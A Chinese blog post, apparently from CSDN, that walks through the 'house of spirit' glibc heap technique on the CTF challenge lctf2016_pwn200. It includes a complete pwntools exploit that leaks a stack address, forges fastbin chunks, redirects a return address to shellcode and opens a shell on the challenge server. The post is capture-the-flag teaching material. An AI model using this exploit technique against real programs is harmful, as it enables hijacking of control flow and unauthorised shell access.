[pwn][堆利用]house of spirit[例题:lctf2016_pwn200]

最新推荐文章于 2024-02-05 11:36:00 发布
最新推荐文章于 2024-02-05 11:36:00 发布
阅读量818 收藏
点赞数 1
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhulintintao/article/details/109889960
版权

House of spirit

  • 实现目的

    • malloc分配到目标地址

  • 实现条件

    • free的参数可控
    • 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域)

  • 实现方法

    • 在目标地址伪造可以被释放到fastbin上的fake chunk
    • 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域
    • 将目标地址作为参数free
    • malloc一次,将返回指向目标地址的指针

  • 实现实例

    • 题目平台

      • buuctf

    • 题目名称

      • lctf2016_pwn200

    • 分析步骤

      • 常规检查
        [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZGWUcZVl-1605921887806)(./spirit/spirit1.jpg)]

      防护全闭

      • 逐步分析

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-au9t7mcv-1605921887809)(./spirit/spirit2.jpg)]

      输入名字时没有溢出,但是存在泄露

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-naKtLCMF-1605921887813)(./spirit/spirit3.jpg)]

      根据栈帧结构,被泄露的地方应该是rbp

      ![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Euc9jQFF-1605921887816)(./spirit/spirit4.jpg)]]

      经过gdb调试,确认是rbp,我们可以通过被泄露的rbp推算其他栈上的地址了

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HGmd550m-1605921887818)(./spirit/spirit5.jpg)]

      继续分析,在获取id时仅能输入三位,并且只能输入数字

      ida伪c代码中有一部分并没有显示完全
      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmVJjrKR-1605921887820)(./spirit/spirit6.jpg)]

      尽管看上去get_id的返回值没有被保存
      但事实上……
      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-21LLWIDd-1605921887821)(./spirit/spirit7.jpg)]

      从汇编代码可以看出,get_id的值被保存在了name的上面
      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-osaNoz3B-1605921887822)(./spirit/spirit8.jpg)]

      进入get_money
      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HzJ8YLSp-1605921887822)(./spirit/spirit9.jpg)]

      首先malloc了一个0x40的chunk,向其中输入最多0x40个字 节,然后将chunk位置保存在全局变量ptr中

      在向chunk中读入内容时存在溢出

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xzoKT1Sy-1605921887823)(./spirit/spirit10.jpg)]

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eyo21Fsh-1605921887824)(./spirit/spirit11.jpg)]

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bGVKu6Wk-1605921887825)(./spirit/spirit12.jpg)]

      可以修改被保存在ptr上的chunk位置

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-b1DCS5Fm-1605921887826)(./spirit/spirit13.jpg)]

      在用户选单中,选择out会把ptr上保存的chunk立即free掉,并将ptr置零,选择in会检测ptr是否为0,如果为0则malloc一个大小在0~0x80内的chunk

      通过对伪代码的分析,可以发现程序的结构是函数一个个的调用,这种结构很容易造成返回地址的低地址和高地址可控。同时,由于第一次申请chunk时存在的溢出,可以控制一次free的参数,满足house of spirit的条件

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EEcuPjCB-1605921887826)(./spirit/spirit14.jpg)]

      在gdb调试的过程中可以发现,0x7fffffffdf78保存了我们输入的id,而0x7fffffffdf10保存了我们输入第一个堆块的内容,0x7fffffffdf10往下0x40个字节都是我们的可控位置,在二者之间保存了get_money的返回地址

      • 此时完整的攻击思路出来了
        • 利用get_name处的泄漏点获取栈地址,并写入shellcode
        • 在get_id处伪造fake chunk的下一个chunk(物理上的)的saze域
        • 在get_money处伪造fake chunk并利用溢出改写ptr上的值为fake chunk的地址
        • free fake chunk
        • malloc回来,改写返回地址为shellcode
        • 选择退出,触发被改写的返回地址,执行shellcode
        • getshell

      • 按照思路编写writeup
        • 泄露栈地址,写入shellcode
          pay=asm(shellcraft.amd64.linux.sh(),arch="amd64")
p.sendafter("who are u?",pay)
p.recvuntil(pay)
stack_add=u64(p.recvuntil(",")[:-1].ljust(8,"\x00"))
print "stack add="+hex(stack_add)
fake_chunk=stack_add-0xb0
name_add=stack_add-0x50
        • 伪造fake chunk以及其后的chunk size
          p.sendlineafter("give me your id ~~?","97")
pay="\x00"*8+p64(0x61)+"\x00"*0x28+p64(fake_chunk)
p.sendafter("give me money~",pay);
        • free然后malloc回来
          p.sendlineafter("your choice :","2")
p.sendlineafter("your choice :","1")
p.sendlineafter("how long?","80")
pay="\x00"*0x38+p64(name_add)
p.sendlineafter("give me more money :",pay);
        • getshell
          p.sendlineafter("your choice :","3")
      • 完整wp
      from pwn import*
from LibcSearcher import*
context(arch='amd64',os='linux',log_level='debug')
#p=process("./1")
p=remote('node3.buuoj.cn','29646')
elf=ELF("./1")

pay=asm(shellcraft.amd64.linux.sh(),arch="amd64")
p.sendafter("who are u?",pay)
p.recvuntil(pay)
stack_add=u64(p.recvuntil(",")[:-1].ljust(8,"\x00"))
print "stack add="+hex(stack_add)
fake_chunk=stack_add-0xb0
name_add=stack_add-0x50

p.sendlineafter("give me your id ~~?","97")
pay="\x00"*8+p64(0x61)+"\x00"*0x28+p64(fake_chunk)
p.sendafter("give me money~",pay);

p.sendlineafter("your choice :","2")
p.sendlineafter("your choice :","1")
p.sendlineafter("how long?","80")
pay="\x00"*0x38+p64(name_add)
p.sendlineafter("give me more money :",pay);
p.sendlineafter("your choice :","3")

p.interactive()
      • 运行效果
        [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QGLOdfLj-1605922017968)(./spirit/spirit15.jpg)]

  • 总结:house of spirit的原理是绕过free到fastbin上的检查,使得一块本来我们不具有写能力的内存被malloc返回。这种漏洞点容易出现在一个函数调用另一个函数,并且两个函数在栈上都有可控区间的情况下,在这种情况下,我们可以通过house of spirit获得修改返回地址的能力,从而劫持程序流。

zltt197
关注
专栏目录
pwn工具箱之house of spirit
jmp esp
07-03 931
house of spirit基本信息 利用种类:利用 利用种类:释放fake chunk 利用思路:通过构造fake chunk,然后使得fake chunk被free,在下一次malloc时返回fake chunk 利用难点 需要能够控制被free的内容,才能构造fake chunk 在free fake chunk的时候,libc会检查next size,也就是从当前位置开始算,加上一个c
日行一pwnpwn1_sctf_2016
m0_57221101的博客
05-13 600
用俩图床,有的有水印,有的没水印,折磨 距离上一次日行一pwn已经快一个月了,干脆改成月行一pwn吧(汗。这段时间去恶补了王爽老师的汇编语言。 结果一回来就做了这么一道题,函数封装的严严实实,打眼一看全是C++。想入门pwn这么难吗。 正片 BUUCTF在线评测 使用BUUCTF靶场,首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编 发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1681
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
house-of-spirit-pwn200
csdn546229768的博客
01-11 2569
前言 : 因为期末考试加上复习的原因,接近一个月没有做pwn题了,放寒假就回来在物理机上面装了个ubuntu(折腾了几天,不过装好了做题环境还是挺好用的),打算这个寒假学习完知识.来年好好上课(大三压力大!)有空打打比赛. 例题 : lctf2016_pwn200 house-of-spirit 利用条件: (1)想要控制的目标区域的上方空间与下方空间都是可控的内存区域 (2)存在可将变量指针覆盖指向为上方可控空间,从而达到将非可控空间与可控空间进行合并变成fake_chunk(有点像unlink) (
PWN-HEAP学习】House of Spirit 学习笔记
SWEET0SWAT的博客
08-16 1424
House of Spirit 原理 l-ctf 2016 pwn200 调试分析 0x7ffd4a390b10: 0x0000000000000031 0x0000003000000001 0x7ffd4a390b20: 0x00007ffd4a390b40 0x00000000004009ff 0x7ffd4a390b30: 0x0000000000000005 0x0000000188ff...
6.house_of_spirit
06-08 137
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file demonstrates the house of spirit attack.\n"); 7 8 fprintf(st...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
PWN.rar_meathlg_site:www.pudn.com
09-23
标题"PWN.rar_meathlg_site:www.pudn.com"暗示了这是一个关于使用attiny13A微控制器生成可调频率和占空比的PWM(脉宽调制)信号的资源,发布在pudn.com网站上。描述进一步强调了这个程序能够实现频率交替变换的PWM方...
Lctf-2016-pwn100 题解
lifanxin的博客
12-24 825
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 栈溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
pwn利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5305
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
lctf2016_pwn200
z1r0的博客
02-22 2736
lctf2016_pwn200 查看保护 这里有一个漏洞,read的时候可以泄露栈上的地址,因为没有\x00来截断。 这里会将buf的东西给复制到dest这里。然后ptr全局变量为dest。 这个函数就是一个add和delete的功能。 攻击思路:可以将shellcode写入第一次输入的地方,再借助这里输出ebp地址,然后算出shellcode_addr。到了strcpy这里的话可以使用\x00来截断复制功能然后填满buf,接着劫持free_got为shellcode_addr(free_got)
[BUUCTF-pwn]——lctf2016_pwn200
Y_peak的博客
03-11 628
[BUUCTF-pwn]——lctf2016_pwn200 题目地址:https://buuoj.cn/challenges#lctf2016_pwn200 还是先chekcsec 一下, 没有开启NX代表我们可以手写shellcode并且执行 在IDA, 中大家自己看看就好,我这里将两个漏洞的位置告诉大家就好 寻找偏移 思路 利用漏洞1, 获得main_ebp地址, 寻找到我们写入的shellcode距离的位置 利用漏洞2 覆盖dest变量值为free的got表的地址, 这样通过strcpy
House of Spirit(fastbin)
weixin_30265171的博客
07-14 167
0x01 fastbin fastbin所包含chunk的大小为16 Bytes, 24 Bytes, 32 Bytes, … , 80 Bytes。当分配一块较小的内存(mem<=64 Bytes)时,会首先检查对应大小的fastbin中是否包含未被使用的chunk,如果存在则直接将其从fastbin中移除并返回;否则通过其他方式(剪切top chunk)得到一块符合大小要求的chunk...
linux 溢出学习之house of spirit(1) malloc maleficarum hos翻译
jmp esp
03-02 2277
综述house of spirit是一种常用的溢出技术,而在如今的malloc实现中依然没有对这种方法进行保护,所以在目前还是一种有效的溢出技术。下面我们先从这种方法的来源之本讲起,即2005 Malloc Maleficarumcsdn原文 The House of SpiritThe House of Spirit is primarily interesting because of th
linux 溢出学习之house of spirit(2)
jmp esp
03-02 980
开篇本篇接上篇的house of spirit技术的学习,上篇我们翻译了这个技术来源的文章,这篇我们将通过实例和总结来进行一个更深入的了解house of spirit 简介 攻击方式:结合栈溢出和溢出 攻击效果:返回任意位置作为一个chunk攻击要求: 可溢出控制某个malloc返回的地址 被控制的地址被free 再次malloc一个chunk 可对第二次分配的chunk进行输入 house o
house_of_spirit && 2014_hack.lu_oreo例题分析
Pwnpanda的博客
08-13 1246
2014_hack.lu_oreo 相关知识点: Fastbin Attack – House of Spirit 相关链接: 2014_hack.lu_oreo下载 CTF Wiki Fastbin Attack IDA创建结构体 题目分析: 先分析功能: ①添加枪支(add),这个地方会读取枪支的名字和描述,这是第一个难点,这个里面存在一个结构体(差点被坑死在这,为...
PWN · heap | House Of Spirit】2014_hack.lu_oreo
最新发布
Mr_Fmnwon的博客
02-05 880
将chunk劫持到指定位置,能够大有作为,而House Of Spirit的目的就是这一点。最初了解仅是了解,通过本题,对于利用手法的利用,感悟更为深入。House of Spirit 是中的一种技术。该技术的核心在于在目标位置处伪造 fastbin chunk,并将其释放,从而达到分配指定地址的 chunk 的目的。要想构造 fastbin fake chunk,并且将其释放时,可以将其放入到对应的 fastbin 链表中,需要绕过一些必要的检测,即。
GDB调试漏洞之house of spirit
ZL_1618的博客
08-14 773
何为house of spirit?​ 该技术出自于2005年的The MallocMaleficarum这篇文章,是一种用于获得某块内存区域控制权的技术 ​例如一个位于fastbin的区块是不可控的,但是我们希望对其进行读写操作只需他刚好满足以下两个条件即可。​第一,改区域的前后内存可控(通俗来讲就是溢出) ​ 第二,存在一个可控指针作为free()函数的参数(此处通俗讲就是控制chunk的fd或者bk指针),通过排布, ​ 伪造fake。
House of Spirit学习调试验证与实践
xiaoi123的博客
08-07 1142
作家:Bug制造机 原文来自:House of Spirit学习调试验证与实践 House of Spirit和其他的利用手段有所不同。它是将存在的指针改写指向我们伪造的块(这个块可以位于、栈、bss任何一个位置)并且free掉欺骗glibc达到把伪造块回收到bins中不过在free之前,需要设置当前伪造块和下一个伪造块的size字段,满足free()的安全检测机制,从而欺骗glibc。...
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要集中在如何通过精心构造payload来控制程序的执行流,尤其是针对ARM架构的程序。 首先,提到的"publicvuln...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值